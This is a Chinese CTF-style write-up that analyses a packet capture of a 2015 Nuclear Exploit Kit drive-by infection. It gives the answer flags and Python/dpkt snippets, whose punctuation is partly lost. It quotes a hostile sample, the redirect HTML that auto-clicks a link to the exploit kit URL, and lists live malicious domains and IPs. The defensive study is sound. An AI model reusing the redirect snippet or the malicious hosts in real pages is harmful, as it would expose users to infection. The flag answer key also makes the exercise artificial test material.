当前位置：首页 > article >正文

玄机靶场-2015-01-09-Traffic analysis exercise WP

article 2026/4/22 19:23:01

玄机靶场-2015-01-09-Traffic analysis exercise WP这道题是一道纯流量分析题考的是 Nuclear Exploit Kit 的完整感染链分析。没有靶机环境直接给了一个 pcap 文件用 Python/dpkt 重组 TCP 流来回答 8 个问题。整体难度中等关键在于理解 EK 的攻击流程以及知道 Wireshark 的 tcp.stream 编号规则。1. 确认活动时间UTC打开 pcap 后看第一个数据包的时间戳直接就是答案。用 dpkt 读取withopen(traffic.pcap,rb)asf:pcapdpkt.pcap.Reader(f)forts,bufinpcap:print(datetime.datetime.utcfromtimestamp(ts))break第一个包时间戳对应 UTC 时间 2015-01-05 16:24:40。注意题目文件名是 2015-01-09但实际流量日期是 1 月 5 日别被文件名带偏。Flag 12015-01-05 16:24:402. 受害 Windows 主机的 IP 和 MAC 地址流量里只有一个内网 IP192.168.204.137其余都是外网服务器。MAC 地址从以太网帧头提取ethdpkt.ethernet.Ethernet(buf)src_mac:.join(%02x%bforbineth.src)# - 00:0c:29:9d:b8:6d00:0c:29开头是 VMware 的 OUI说明这是一台 VMware 虚拟机典型的分析环境。Flag 2192.168.204.137,00:0c:29:9d:b8:6d3. 受感染网站的 IP 和域名整个感染链的入口是受害者通过 Google 搜索结果点进去的一个匈牙利网站。从 tcp.stream 0 的 HTTP 请求可以看到GET http://www.opushangszer.hu/ HTTP/1.1 Referer: http://www.google.si/url?urlhttp://www.opushangszer.hu/...这个网站的 IP 是94.199.178.119它的页面里嵌入了恶意 SWF触发了后续的 EK 感染链。这是典型的 Drive-by Download 场景合法网站被植入了恶意代码。Flag 394.199.178.119,www.opushangszer.hu4. 漏洞利用工具包EK的 IP 和域名这套 EK 是 Nuclear Exploit KitC2 域名是static.domainvertythephones.com解析到167.160.46.121。从 tcp.stream 3、4、5 可以看到所有与 EK 的通信都指向这个 IP。域名用了static.前缀伪装成静态资源服务器是 EK 的常见混淆手段。Flag 4167.160.46.121,static.domainvertythephones.com5. 受害主机使用的浏览器从所有 HTTP 请求的 User-Agent 字段可以看到Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)这是 Internet Explorer 8运行在 Windows 7NT 6.1上。IE 8 是 2015 年初仍然常见的老版本浏览器对各种 EK 的漏洞利用几乎没有防御能力。Flag 5Internet Explorer 86. 返回 EK 重定向的 HTTP 请求参数值感染链的中间跳板是akronkappas.com。受感染网站opushangszer.hu里的恶意 SWFd6bc1dc7da4ed54a62b93b5d0f1cc40c.swf在 Flash 执行后向akronkappas.com发了一个 POST 请求POST /d2a42e1f7d9a1021bd7d93af414c95c4.php?q70a9b40eb73da11445c3a3609c8241d9 HTTP/1.1 Host: akronkappas.com Referer: http://imprintchurch.org/d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf服务器响应返回了一段 HTML里面用 JavaScript 自动点击一个链接跳转到 EKaidmyLinkhrefhttp://static.domainvertythephones.com/3h251q2c35click/ascriptdocument.getElementById(myLink).click();/script题目问的是 GET 请求里唯一的参数值即q参数的值。Flag 670a9b40eb73da11445c3a3609c8241d97. 包含恶意软件负载的 tcp.stream整个流量里共有 6 个 TCP 流tcp.stream 0~5tcp.stream连接内容0→ 94.199.178.119:80受感染网站页面1→ 75.126.113.164:80恶意 SWF 文件942 bytes2→ 69.65.9.55:80Flash POST 请求 EK 跳转响应3→ 167.160.46.121:80EK Landing Pagegzip 压缩 HTML4→ 167.160.46.121:80恶意软件负载242,285 bytesapplication/octet-stream5→ 167.160.46.121:80EK 后续 HTML 响应tcp.stream 4 是关键服务器返回了一个 242,285 bytes 的application/octet-stream文件这是经过 XOR 加密的 PE 可执行文件恶意软件负载。Nuclear EK 惯用 XOR 加密 payload 来绕过 IDS 检测。在 Wireshark 里用过滤器tcp.stream eq 4可以隔离出这条流。Flag 7tcp.stream eq 48. Flash 播放器版本Flash 版本信息隐藏在 HTTP 请求头里。在 tcp.stream 1请求恶意 SWF和 tcp.stream 3访问 EK Landing Page的请求头中都有flash-version: 11,8,800,94这是 Flash Player 11.8.800.94是 2013 年的版本存在多个已知漏洞正是 Nuclear EK 利用的目标。Flag 811.8.800.94总结这道题还原了一条完整的 Nuclear EK 感染链用户通过 Google 点进被植入恶意代码的匈牙利网站 → 触发恶意 SWF → Flash 向跳板服务器 POST 请求 → 跳板返回 EK 链接 → EK Landing Page 检测环境 → 下载 XOR 加密的恶意软件 payload。整个过程不到 2 分钟受害者全程无感知。Flag 汇总步骤问题答案1活动时间UTC2015-01-05 16:24:402受害主机 IP 和 MAC192.168.204.137,00:0c:29:9d:b8:6d3受感染网站 IP 和域名94.199.178.119,www.opushangszer.hu4EK IP 和域名167.160.46.121,static.domainvertythephones.com5浏览器Internet Explorer 86GET 参数值70a9b40eb73da11445c3a3609c8241d97恶意软件负载所在流tcp.stream eq 48Flash 版本11.8.800.94

玄机靶场-2015-01-09-Traffic analysis exercise WP

相关文章：

玄机靶场-2015-01-09-Traffic analysis exercise WP

Qwen3.5-9B-GGUF保姆级教程：service.log日志解读与常见启动失败根因分析

从毕业设计到实战：手把手教你用SolidWorks复现一个220V电动扳手的传动系统

如何快速批量下载抖音合集：终极工具使用指南

AutoCAD字体管理革命：FontCenter智能插件彻底解决字体缺失难题

仅限三级医院DevOps团队内部流通：Docker医疗调试禁忌清单（含17个导致HIPAA审计失败的配置雷区）

3步实现Windows任务栏透明化：TranslucentTB完整使用指南

从Kubernetes到Docker：看云原生技术如何成功‘跨越鸿沟’（给技术布道者的实战指南）

避坑实录：手把手解决Ubuntu 18.04安装后找不到有线网络的Realtek驱动问题

AutoSubs深度解析：5分钟掌握本地AI字幕生成，让视频制作效率提升300%

别再只会改颜色了！ArcGIS Pro 2023 数据可视化保姆级指南：从矢量分级到3D渲染

机器学习规模化实践：从实验到生产的工程化之路

【5G通信】5G通信超密集网络多连接负载均衡和资源分配Matlab实现

车辆轨迹跟踪MPC、神经网络NN+自适应神经模糊系统ANFIS优化模型预测仿真（带参考文献）

Python机器学习怎么防止数据泄漏_确保Scaler在Pipeline内拟合

ROFL-Player：英雄联盟回放分析终极指南 - 无需启动客户端的专业工具

CSS粘性定位不生效怎么办_检查父元素高度与overflow属性设置

别再自己写哈希函数了！C++11 std::hash 实战避坑指南（附自定义类型完整代码）

JDK 17强封装性引发的‘血案’：ShardingSphere/MyBatis项目升级踩坑实录与一劳永逸的配置

网盘直链下载助手：一键获取8大平台真实下载地址，告别限速烦恼

如何用GHelper优化华硕笔记本性能：3步完整配置指南

WechatBakTool：微信聊天记录备份的终极解决方案与技术思考

STM32差分升级增量算法源码，C语言编写，支持IAP和OTA，适用于物联网和车联网

3分钟搞定B站字幕提取：告别手动抄写的烦恼

重新思考6G

xilinx vivado cameralink图像接收与发送代码，最大支持并行速度100MH...

NoFences：免费开源桌面分区工具，让你的Windows桌面整洁度提升300%

TwitchDropsMiner：3大智能特性让游戏奖励自动到手

Plotly多坐标轴进阶玩法：用底层API打造4个Y轴的传感器数据仪表盘

go json反序列化?_?Go语言中JSON反序列化到结构体的Unmarshal方法详解